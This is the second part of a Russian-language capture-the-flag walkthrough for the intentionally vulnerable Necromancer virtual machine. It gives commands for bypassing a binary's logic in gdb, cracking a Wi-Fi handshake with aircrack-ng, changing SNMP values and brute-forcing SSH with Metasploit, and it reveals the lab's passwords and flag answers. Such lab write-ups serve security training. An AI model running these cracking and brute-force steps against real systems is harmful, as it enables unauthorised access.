В этой статье продолжим поиск флагов в уязвимой VM Necromancer.



Сохраняем файл talisman, и меняем ему разрешение. Затем запускаем его:



При ответе на вопрос, хотим ли мы одеть талисман, ничего не произошло.

Попробуем отладить этот файл с помощью утилиты - отладчика gdb.

Отладчиком называется программа, которая выполняет внутри себя другую программу. Основное назначение отладчика - дать возможность пользователю в определенной степени осуществлять контроль над выполняемой программой, т.е. определять, что происходит в процессе ее выполнения. Наиболее известным отладчиком для Linux является программа GNU GDB.

> gdb /root/talisman

И получим немного информации о функциях программы:

> info functions




Создадим точку восстановления wearTalisman, потому, что после, нам понадобиться одеть талисман.


> break wearTalisman

> run

Затем перейдем к chantToBreakSpell:


> jump chantToBreakSpell



Нам удалось одеть талисман. Мы получаем наш 4-й флаг и намек повторить слова из флага на UDP порту 31337. Перед этим декодируем из base64 в человекопонятный текст – blackmagic




Получаем 5-й флаг и информацию о директории, которую следует посетить:


> 192.168.0.109/thenecromancerwillabsorbyoursoul

Слово necromancer– является ссылкой, которая предлагает нам скачать файл, сохраним его:



Внизу страницы, так же есть подсказка, указывающая на UDP порт 161 (используется для SNMP) В первую очередь займемся анализом самого файла, для этого необходимо использовать Wireshark. Нужно будет два раза распаковать архив, для того, чтобы добраться до файла с расширением .cap



При рассмотрении файла, выясняется, что это дамп сигнализации в стандарте IEEE 802.11, а значит, имеет место быть Wi-Fi, возможно это хэндшейк.



В общем, попробуем расковырять это с помощью aircrack-ng и полюбившимся словарем rockyou.txt.

> aircrack-ng /root/ necromancer.cap -w /usr/share/wordlists/rockyou.txt




Спустя немного времени, обнаруживается пароль.



Итак, мы имеем на текущий момент:

· пароль – death2all

· Вероятно открытый 161 порт. Здесь, сделаю отступление:



SNMP— стандартный интернет-протокол для управления устройствами в IP-сетях на основе архитектур TCP/UDP. К поддерживающим SNMP устройствам относятся маршрутизаторы, коммутаторы, серверы, рабочие станции, принтеры, модемные стойки и другие.

Порт/ID: 161/UDP,162/UDP

Для использования данного порта, а точнее для взаимодействия с ним, нами будет использоваться Net-SNMP — представляет собой набор программного обеспечения для развёртывания и использования протокола SNMP (v1, v2c и v3 и протокол AgentX субагента). Он поддерживает IPv4, IPv6, IPX, AAL5, сокеты доменов UNIX и других протоколов.

Приложения, входящие в Net-SNMP:

· encode_keychange — производит изменение ключа KeyChange в SNMPv3.

· snmptranslate — перевод MIB OID имён между цифровой и текстовой формами.

· snmpget — взаимодействует с сетью, используя SNMP GET запросы.

· snmpgetnext — взаимодействует с сетью, используя SNMP GetNext запросы.

· snmpbulkget — взаимодействует с сетью, используя SNMP GETBULK запросы.

· snmpwalk — получает поддерево управления значений с помощью SNMP GetNext запросов.

· snmpbulkwalk — получает поддерево управления значений с помощью SNMP GETBULK запросов.

· snmpset — взаимодействует с сетью, используя SNMP SET запросы.

· snmptrap — посылать SNMP траппы или информационные сообщения.

· snmpd — SNMP агент, который отвечает на запросы SNMP для данного хоста.

· snmptrapd — демон SNMP, прослушивает SNMP траппы или информационные сообщения, регистрируя их, или воздействует на них.

· snmptest — взаимодействует с сетью, используя SNMP запросы.

· mib2c — утилита преобразования MIB-файлов, которая позволяет перевести MIB-структуру в другие формы, такие как C-код

· tkmib — Perl/Tk интерактивный графический браузер MIB для SNMP.

Продолжаем, с помощью утилиты – snmpwalk:

> snmpwalk-c death2all -v 1 192.168.0.103




Результат – «Закрыто». Пробуем открыть с помощью – snmpset.


> snmpset -c death2allrw -v 1 192.168.0.103 iso.3.6.1.2.1.1.6.0 s Unlocked



Строка должна принять вид «Unlocked» Теперь выполняем предыдущую команду:

> snmpwalk-c death2all -v 1 192.168.0.103




Счастье, то какое, 7-ой флаг и подсказка, явно указывающая на SSH порт.

7-ой флаг – это хэш MD5. Вытащим из него информацию:



В результате получен – demonslayer, который возможно, является паролем или логином к SSH. Пробуем:

> ssh 192.168.0.103



В качестве пароля он не подошел, значит это логин. Для поиска пароля воспользуемся брутфорсом по словарю rockyou.txt и Metasploit Framework.

> msfconsole

> use auxiliary/scanner/ssh/ssh_login

> set rhosts 192.168.0.103

> set username demonslayer

> set pass_file /usr/share/wordlists/rockyou.txt

> run




Используя эти учетные данные, устанавливаем соединение на 22-ом порту:


> ssh demonslayer@192.168.0.103




Осмотримся вокруг и обнаруживаем 8-ой флаг, заглянем внутрь.


> ls –a

> cat flag8.txt

Defend yourself! –Стоит рассматривать как localhost на 777 порту.


> nc localhost 777



Теперь необходимо ответить на несколько вопросов.

Первый вопрос - Where do the Black Robes practice magic of the Greater Path?

Ответ – Kelewan.

Второй вопрос- Who did Johann Faust VIII make a deal with?

Ответ – Mephistopheles.

Третий вопрос - Who is tricked into passing the Ninth Gate?

Ответ – Hedge.

Попутно собираем флаги.



Последнее предложение дает подсказку. Осмотримся внимательнее еще раз. Вернемся на шаг назад.

> ls –la

> cat .smallvile



Сказано, что мы получили великую силу, значит ли это, что можно использовать sudo?

> sudo –l




Значит. Ну и следуя инструкции, заглянем в последний, 11-й флаг на этой машине.


> sudo /bin/cat /root/flag11.txt



На этом и заканчивается прохождение этой VM. Спасибо за внимание.

Первая часть тут.